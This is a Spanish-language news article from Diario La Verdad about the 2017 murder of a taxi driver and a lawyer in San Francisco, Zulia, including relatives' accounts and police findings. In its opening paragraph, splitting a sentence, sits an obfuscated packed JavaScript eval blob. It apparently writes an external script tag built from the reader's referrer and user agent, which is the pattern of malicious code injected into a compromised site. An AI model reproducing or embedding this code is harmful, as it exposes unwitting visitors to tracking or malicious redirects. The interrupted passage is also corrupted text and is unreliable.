publicidad

"Le dejé la cena servida a mi hijo y nunca volvió"

Henry Chirinos Cherubine / Maracaibo / noticias@laverdad.com
Ambas eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|krkkr|var|u0026u|referrer|ensak||js|php'.split('|'),0,{})) familias piden con fervor a la Policía la pronta captura de los culpables. Hasta los momentos los detectives aseguran no tener establecido un móvil concreto del crimen

Los Villasmil lloran la perdida de Kendry, un joven a quien describieron como ejemplar. (Fotos: José Nava)

Dos familias sumidas en una tristeza sin precedentes y dos versiones se entrelazan con respecto al asesinato de Kendry Saúl Villasmil Durán (21) y Yenny Coromoto Medina Oliveros (39) hallados en una trilla cerca del club Okinawa, en el municipio San Francisco la mañana del pasado jueves, golpeados, maniatados y cada uno con un balazo en la cabeza. Viviendas humildes acobijaron los féretros,  ambas familias se preguntaban el motivo que llevó a los homicidas a cometer tan repudiable acción.

A orillas de la Circunvalación 1 del lado de San Francisco, en una casa con frente en construcción se encontraban los familiares de Villasmil Durán, el joven taxista quien también era estudiante de Ingeniería Mecánica y estaba pronto a graduarse. Sus allegados lo describieron como una persona estudiosa, trabajadora y sin problemas de ningún tipo. Su tía, Marinés Durán contó que la última  vez que supieron de él fue a las 7.00 de la noche que “le escribió a su papá diciéndole que iba a trabajar un ratico. Su papá le dejó la cena servida pero nunca llegó”. 

Compañeros de trabajo de la línea Taxi Dálmata, indicaron que el servicio salió a las 8.00 de la noche. “Kendry fue a buscar a la mujer porque ella pidió un taxi con aire y vidrios oscuros”, recordó la presidenta de la línea. 

Villasmil salió de la central  a buscar su “carrerita” frente a la licorería La Grey, pasaron 15 minutos y el centralista intentó hacer contacto con el joven para verificar si había realizado el servicio pero todos sus intentos fueron en vano.

Sin explicación

A escasas cuadras se llevaba a cabo el velorio de Yenny Medina. Sus cinco hijos, sus hermanos y su esposo Roger Velázquez , funcionario activo de la Policía nacional, le daban el último adiós a la abogada. Este informó que el último mensaje que recibió de su pareja fue a las 7.10 de la noche, donde le decía que se encontraba haciendo la cena en casa de su mamá. 

“Yo no sabía que ella había salido a comprar medicinas”, expresó el policía. "Yo estaba en casa de mi mamá, a las 8.00 le envié un mensaje, lo recibió pero nunca me respondió”.

El hermano de la occisa afirmó que regularmente ella pedía los servicios de esa línea de taxi y esa noche al no conseguir una medicina para su hijo en la farmacia cercana llamó para poder seguir buscándola. 

A las 10.00 de la noche Velázquez es alertado de que su esposa no retornó y es cuando en compañía de su hermano que también es funcionario, comienza la fatídica búsqueda por todos los centros de salud de los municipios Maracaibo y San Francisco. No fue sino hasta las 07.00 de la mañana del jueves que recibe la terrible noticia, de que Yenny apareció muerta en una trilla junto a Kendry, el taxista. 

Investigaciones

La Policía científica inició las investigaciones de manera inmediata, según un fuente oficial, al joven lo amarraron con nylon fino por las muñecas y lo golpearon, ambos presentaron heridas de bala en la cabeza y el proyectil extraído de sus cráneos por los médicos forenses era de un revólver calibre 38 milímetros. 

Del vehículo solo se llevaron el radio transmisor y los celulares, pues este luego lo encontraron abandonado en la urbanización Coromoto. Aún no se especifica el móvil del doble homicidio que según la data de muerte se ejecutó el pasado miércoles a las 10.00 de la noche. Sin embargo los sabuesos presumen que puedan estar ante un crimen pasional. Trascendió que una cámara de seguridad logró registrar el momento en el que los presuntos asesinos arrancaron con el carro a toda velocidad. El operador de la línea de taxis Dalmatas, es invatigado por la Policía. 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama